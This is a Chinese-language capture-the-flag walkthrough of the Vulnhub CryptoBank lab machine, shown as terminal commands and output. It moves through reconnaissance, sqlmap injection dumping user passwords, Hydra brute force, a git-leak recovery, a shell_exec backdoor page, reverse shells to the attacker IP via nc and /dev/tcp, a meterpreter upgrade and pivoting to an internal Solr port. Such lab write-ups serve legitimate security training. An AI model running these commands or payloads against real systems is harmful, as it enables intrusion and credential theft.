Vulnhub之CryptoBank靶机详细测试过程
CryptoBank
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:03 1 60 Unknown vendor
192.168.56.100 08:00:27:1f:96:d2 1 60 PCS Systemtechnik GmbH
192.168.56.254 08:00:27:d0:df:39 1 60 PCS Systemtechnik GmbH
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-03 22:11 EDT
Nmap scan report for localhost (192.168.56.254)
Host is up (0.0015s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 7f4e59dfb75549cfd3122d19010543f7 (RSA)
| 256 5e1b3798abc7e6ee5ff8df4314de284e (ECDSA)
|_ 256 8ea9909f6e51b1c726ea07ac6928b31c (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: CryptoBank
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:D0:DF:39 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
获得Shell
需要添加主机记录才能访问login以及register
──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ sudo vim /etc/hosts
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.254 cryptobank.local
注册功能当前是关闭的。
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ nikto -h http://192.168.56.254
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.56.254
+ Target Hostname: 192.168.56.254
+ Target Port: 80
+ Start Time: 2023-06-03 22:19:43 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 82f7, size: 5a30acd90b6ab, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: POST, OPTIONS, HEAD, GET .
+ /info.php: Output from the phpinfo() function was found.
+ /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. See: CWE-552
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /info.php?file=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ 8255 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2023-06-03 22:19:57 (GMT-4) (14 seconds)
──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ gobuster dir -u http://192.168.56.254 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh,.js
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.254
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: php,txt,html,sh,js
[+] Timeout: 10s
===============================================================
2023/06/03 22:20:22 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 33527]
/.html (Status: 403) [Size: 279]
/index.js (Status: 200) [Size: 458095]
/info.php (Status: 200) [Size: 86157]
/assets (Status: 301) [Size: 317] [--> http://192.168.56.254/assets/]
/development (Status: 401) [Size: 461]
/trade (Status: 301) [Size: 316] [--> http://192.168.56.254/trade/]
/closed.html (Status: 200) [Size: 65]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
/development目录需要网页基础认证,看是不是可以用hydra破解,但是没有成功。
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt -s 80 -f 192.168.56.254 http-get /development
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
注意到在网页中Team部分每个成员有联系按钮,通过浏览器地址栏中可创建用户名列表
如:
http://cryptobank.local/william.d
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ cat users_list
william.d
julius.b
bill.w
john.d
用Burpsuite拦截请求,并存储为文件req.txt,然后扫描一下是否存在SQL注入漏洞:
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ ls
hydra.restore nmap_full_scan req.txt users_list
──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ sqlmap -r req.txt --level=3
POST parameter 'user' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
经过SQLMAP的测试,user参数存在SQL注入漏洞,接下来将数据库信息Dump出来:
(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ sqlmap -r req.txt --level=3 --dbs
available databases [5]:
[*] cryptobank
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ sqlmap -r req.txt --level=3 -D cryptobank --tables
Database: cryptobank
[3 tables]
+----------+
| accounts |
| comments |
| loans |
+----------+
─(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ sqlmap -r req.txt --level=3 -D cryptobank -T accounts --columns
Database: cryptobank
Table: accounts
[4 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| balance | int(11) |
| id_account | int(11) |
| password | varchar(100) |
| username | varchar(50) |
+------------+--------------+
将SQLMAP得到的用户名和密码分别创建为字典
(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ sqlmap -r req.txt --level=3 -D cryptobank -T accounts -C username,password --dump
Database: cryptobank
Table: accounts
[12 entries]
+--------------------+------------+
| username | password |
+--------------------+------------+
| spongebob | 3mwZd896Me |
| bill.w | 3Nrc2FYJMe |
| deadbeef | 6X7DnLF5pG |
| dreadpirateroberts | 7HwAEChFP9 |
| notanirsagent | 8hPx2Zqn4b |
| williamdelisle | gFG7pqE5cn |
| buzzlightyear | LnBHvEhmw3 |
| mrbitcoin | LxZjkK87nu |
| johndl33t | NqRF4W85yf |
| juliusthedeveloper | wJWm4CgV26 |
| patric | x8CRvHqgPp |
| tim | zm2gBcaxd3 |
+--------------------+------------+
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ cat user.dict
spongebob
bill.w
deadbeef
dreadpirateroberts
notanirsagent
williamdelisle
buzzlightyear
mrbitcoin
johndl33t
juliusthedeveloper
patric
tim
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ cat password.dict
3mwZd896Me
3Nrc2FYJMe
6X7DnLF5pG
7HwAEChFP9
8hPx2Zqn4b
gFG7pqE5cn
LnBHvEhmw3
LxZjkK87nu
NqRF4W85yf
wJWm4CgV26
x8CRvHqgPp
zm2gBcaxd3
并且把之前得到的用户名也追加到user.dict字典中
─(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ cat users_list >> user.dict
因为前面/development的网页基础认证没有破解出密码,再次用从数据库得到的密码以及用户创建的字典进行破解:
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ hydra -L user.dict -P password.dict -s 80 -f 192.168.56.254 http-get /development
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-06-03 23:23:51
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 192 login tries (l:16/p:12), ~12 tries per task
[DATA] attacking http-get://192.168.56.254:80/development
[80][http-get] host: 192.168.56.254 login: julius.b password: wJWm4CgV26
[STATUS] attack finished for 192.168.56.254 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-06-03 23:24:03
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ dirb http://192.168.56.254/development/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Jun 3 23:25:37 2023
URL_BASE: http://192.168.56.254/development/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.254/development/ ----
(!) WARNING: All responses for this directory seem to be CODE = 401.
(Use mode '-w' if you want to scan it anyway)
用得到的用户名和密码再扫描一下/development
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ dirb http://192.168.56.254/development/ -u julius.b:wJWm4CgV26
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Jun 3 23:27:42 2023
URL_BASE: http://192.168.56.254/development/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
AUTHORIZATION: julius.b:wJWm4CgV26
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.254/development/ ----
==> DIRECTORY: http://192.168.56.254/development/backups/
+ http://192.168.56.254/development/index.html (CODE:200|SIZE:21)
+ http://192.168.56.254/development/php.ini (CODE:200|SIZE:109)
==> DIRECTORY: http://192.168.56.254/development/tools/
---- Entering directory: http://192.168.56.254/development/backups/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.254/development/tools/ ----
+ http://192.168.56.254/development/tools/index.php (CODE:403|SIZE:689)
==> DIRECTORY: http://192.168.56.254/development/tools/Resources/
---- Entering directory: http://192.168.56.254/development/tools/Resources/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sat Jun 3 23:27:48 2023
DOWNLOADED: 9224 - FOUND: 3
在/development/下发现了/backups /tools/子目录
http://cryptobank.local/development/backups/home/
需要对/home目录继续扫描
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ dirb http://cryptobank.local/development/backups/home/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Jun 3 23:30:03 2023
URL_BASE: http://cryptobank.local/development/backups/home/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://cryptobank.local/development/backups/home/ ----
+ http://cryptobank.local/development/backups/home/.git/HEAD (CODE:200|SIZE:23)
+ http://cryptobank.local/development/backups/home/.htaccess (CODE:200|SIZE:12)
==> DIRECTORY: http://cryptobank.local/development/backups/home/assets/
==> DIRECTORY: http://cryptobank.local/development/backups/home/development/
+ http://cryptobank.local/development/backups/home/index.html (CODE:200|SIZE:33603)
==> DIRECTORY: http://cryptobank.local/development/backups/home/trade/
---- Entering directory: http://cryptobank.local/development/backups/home/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://cryptobank.local/development/backups/home/development/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://cryptobank.local/development/backups/home/trade/ ----
+ http://cryptobank.local/development/backups/home/trade/index.php (CODE:403|SIZE:689)
-----------------
END_TIME: Sat Jun 3 23:30:08 2023
DOWNLOADED: 9224 - FOUND: 4
发现了/.git目录
接下来用githack工具
─(kali㉿kali)-[~/Toolsets/GitHack]
└─$ python GitHack.py http://cryptobank.local/development/backups/home/.git/
┌──(kali㉿kali)-[~/Toolsets/GitHack]
└─$ cd cryptobank.local
┌──(kali㉿kali)-[~/Toolsets/GitHack/cryptobank.local]
└─$ ls -alh
total 560K
drwxr-xr-x 6 kali kali 4.0K Jun 3 23:31 .
drwxr-xr-x 7 kali kali 4.0K Jun 3 23:31 ..
drwxr-xr-x 6 kali kali 4.0K Jun 3 23:31 assets
-rw-r--r-- 1 kali kali 65 Jun 3 23:31 closed.html
drwxr-xr-x 3 kali kali 4.0K Jun 3 23:31 development
-rw-r--r-- 1 kali kali 260 Jun 3 23:31 dev-notes.txt
-rw-r--r-- 1 kali kali 66 Jun 3 23:31 .gitattributes
-rw-r--r-- 1 kali kali 33K Jun 3 23:31 index.html
-rw-r--r-- 1 kali kali 448K Jun 3 23:31 index.js
-rw-r--r-- 1 kali kali 5.3K Jun 3 23:31 ninjacheck.php
drwxr-xr-x 8 kali kali 4.0K Jun 3 23:31 ninjafirewall
-rw-r--r-- 1 kali kali 29K Jun 3 23:31 style.css
drwxr-xr-x 3 kali kali 4.0K Jun 3 23:31 trade
┌──(kali㉿kali)-[~/Toolsets/GitHack/cryptobank.local]
└─$ cd development
┌──(kali㉿kali)-[~/Toolsets/GitHack/cryptobank.local/development]
└─$ ls -alh
total 24K
drwxr-xr-x 3 kali kali 4.0K Jun 3 23:31 .
drwxr-xr-x 6 kali kali 4.0K Jun 3 23:31 ..
-rw-r--r-- 1 kali kali 154 Jun 3 23:31 .htaccess
-rw-r--r-- 1 kali kali 109 Jun 3 23:31 php.ini
drwxr-xr-x 6 kali kali 4.0K Jun 3 23:31 tools
-rw-r--r-- 1 kali kali 109 Jun 3 23:31 .user.ini
┌──(kali㉿kali)-[~/Toolsets/GitHack/cryptobank.local/development]
└─$ cd tools
┌──(kali㉿kali)-[~/…/GitHack/cryptobank.local/development/tools]
└─$ ls -alh
total 32K
drwxr-xr-x 6 kali kali 4.0K Jun 3 23:31 .
drwxr-xr-x 3 kali kali 4.0K Jun 3 23:31 ..
drwxr-xr-x 2 kali kali 4.0K Jun 3 23:31 CommandExecution
drwxr-xr-x 3 kali kali 4.0K Jun 3 23:31 FileInclusion
drwxr-xr-x 2 kali kali 4.0K Jun 3 23:31 FileUpload
-rw-r--r-- 1 kali kali 1014 Jun 3 23:31 homepage.html
-rw-r--r-- 1 kali kali 62 Jun 3 23:31 index.php
drwxr-xr-x 2 kali kali 4.0K Jun 3 23:31 Resources
┌──(kali㉿kali)-[~/…/GitHack/cryptobank.local/development/tools]
└─$ cd CommandExecution
┌──(kali㉿kali)-[~/…/cryptobank.local/development/tools/CommandExecution]
└─$ ls
commandexec.html CommandExec.php
┌──(kali㉿kali)-[~/…/cryptobank.local/development/tools/CommandExecution]
└─$ cat CommandExec.php
<html>
<head>
<title>CommandExec-1</title>
</head>
<body>
<div style="background-color:#afafaf;padding:15px;border-radius:20px 20px 0px 0px">
<button type="button" name="homeButton" onclick="location.href='../homepage.html';">Home Page</button>
<button type="button" name="mainButton" onclick="location.href='commandexec.html';">Main Page</button>
</div>
<div style="background-color:#c9c9c9;padding:20px;">
<h1 align="center">Auth to execute system command</h1>
<form align="center" action="CommandExec.php" method="$_GET">
<label align="center">Username:</label><br>
<input align="center" type="text" name="username" value=""><br>
<label>Password:</label><br>
<input align="center" type="password" name="password" value=""><br>
<input align="center" type="submit" value="Submit">
</form>
</div>
<div style="background-color:#ecf2d0;padding:20px;border-radius:0px 0px 20px 20px" align="center">
<?php
if(isset($_GET["username"])){
//echo shell_exec($_GET["username"]);
if($_GET["password"] == "wJWm4CgV26")
echo shell_exec($_GET["username"]);
}
?>
</div>
</body>
</html>
因此可以访问路径/development/tools/
从CommandExec.php 文件得知,只要密码输入为wJWm4CgV26,然后会通过函数shell_exec执行命令,命令参数为username
证明可以正确执行命令
在username直接填写nc -e /bin/bash 192.168.56.253 5555,发现返回错误:
可以在Kali Linux常见shell文件,然后利用wget命令上传到目标主机
──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ msfvenom -p cmd/unix/reverse_bash LHOST=192.168.56.253 LPORT=5555 -f raw
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 78 bytes
bash -c '0<&191-;exec 191<>/dev/tcp/192.168.56.253/5555;sh <&191 >&191 2>&191'
─(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ echo '0<&191-;exec 191<>/dev/tcp/192.168.56.253/5555;sh <&191 >&191 2>&191' > revshell.sh
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
然后在username中输入wget http://192.168.56.253:8000/revshell.sh
利用ls命令查看是否上传成功
成功上传
然后在username中输入bash revshell.sh
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ sudo nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.56.253] from (UNKNOWN) [192.168.56.254] 38662
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
which python3
/usr/bin/python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@cryptobank:/var/www/cryptobank/development/tools/CommandExecution$ cd /home
<tobank/development/tools/CommandExecution$ cd /home
www-data@cryptobank:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Apr 10 2020 .
drwxr-xr-x 24 root root 4.0K Apr 10 2020 ..
drwxr-xr-x 5 cryptobank cryptobank 4.0K Apr 16 2020 cryptobank
www-data@cryptobank:/home$ cd cryptobank
cd cryptobank
www-data@cryptobank:/home/cryptobank$ ls -alh
ls -alh
total 52K
drwxr-xr-x 5 cryptobank cryptobank 4.0K Apr 16 2020 .
drwxr-xr-x 3 root root 4.0K Apr 10 2020 ..
-rw------- 1 cryptobank cryptobank 11 Apr 16 2020 .bash_history
-rw-r--r-- 1 cryptobank cryptobank 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 cryptobank cryptobank 3.7K Apr 4 2018 .bashrc
drwx------ 2 cryptobank cryptobank 4.0K Apr 10 2020 .cache
-rw-r--r-- 1 root root 26 Apr 11 2020 .gitconfig
drwx------ 3 cryptobank cryptobank 4.0K Apr 10 2020 .gnupg
drwxrwxr-x 3 cryptobank cryptobank 4.0K Apr 10 2020 .local
-rw------- 1 root root 1.7K Apr 11 2020 .mysql_history
-rw-r--r-- 1 cryptobank cryptobank 807 Apr 4 2018 .profile
-rw-r--r-- 1 cryptobank cryptobank 0 Apr 10 2020 .sudo_as_admin_successful
-rw-rw-r-- 1 cryptobank cryptobank 169 Apr 11 2020 .wget-hsts
-rwxrwxrwx 1 cryptobank cryptobank 28 Apr 16 2020 flag.txt
www-data@cryptobank:/home/cryptobank$ cat flag.txt
cat flag.txt
flag{l4szl0h4ny3cz1smyh3r0}
www-data@cryptobank:/home/cryptobank$
升级成meterpreter
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.56.253 LPORT=6666 -f elf -o esclate.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of elf file: 250 bytes
Saved as: esclate.elf
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ msfconsole -q
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > set LHOST 192.168.56.253
LHOST => 192.168.56.253
msf6 exploit(multi/handler) > set LPORT 6666
LPORT => 6666
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.56.253:6666
[*] Sending stage (3045348 bytes) to 192.168.56.254
[*] Meterpreter session 1 opened (192.168.56.253:6666 -> 192.168.56.254:48398) at 2023-06-04 00:05:17 -0400
meterpreter > netstat -tunlp
Connection list
===============
Proto Local address Remote address State User Inode PID/Program name
----- ------------- -------------- ----- ---- ----- ----------------
tcp 127.0.0.53:53 0.0.0.0:* LISTEN 101 0
tcp 0.0.0.0:22 0.0.0.0:* LISTEN 0 0
tcp 172.17.0.1:8983 0.0.0.0:* LISTEN 0 0
tcp 127.0.0.1:3306 0.0.0.0:* LISTEN 111 0
tcp 192.168.56.254:38688 192.168.56.253:5555 ESTABLISHED 33 0
tcp 192.168.56.254:48398 192.168.56.253:6666 ESTABLISHED 33 0
tcp :::22 :::* LISTEN 0 0
tcp :::80 :::* LISTEN 0 0
tcp ::ffff:192.168.56.254:80 ::ffff:192.168.56.253:39188 ESTABLISHED 33 0
tcp ::ffff:192.168.56.254:80 ::ffff:192.168.56.253:36640 CLOSE_WAIT 33 0
udp 127.0.0.53:53 0.0.0.0:* 101 0
udp 192.168.56.254:68 0.0.0.0:* 100 0
发现运行8983端口。
meterpreter > run autoroute --help
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[-] Missing -s (subnet) option
meterpreter > run autoroute -s 172.17.0.0/24
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 172.17.0.0/255.255.255.0...
[+] Added route to 172.17.0.0/255.255.255.0 via 192.168.56.254
[*] Use the -p option to list all active routes
为了观察8983端口的服务,创建端口转发(172.17.0.1是容器的本地地址)
meterpreter > portfwd add -l 81 -p 8983 -r 172.17.0.1
[*] Forward TCP relay created: (local) :81 -> (remote) 172.17.0.1:8983
然后在Kali Linux浏览器访问http://127.0.0.1:81
运行solr服务,查找漏洞利用代码
msf6 exploit(multi/handler) > search solr
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/solr_velocity_rce 2019-10-29 excellent Yes Apache Solr Remote Code Execution via Velocity Template
1 auxiliary/scanner/http/log4shell_scanner 2021-12-09 normal No Log4Shell HTTP Scanner
2 exploit/linux/http/trendmicro_websecurity_exec 2020-06-10 excellent Yes Trend Micro Web Security (Virtual Appliance) Remote Code Execution
猜测solr的密码为solr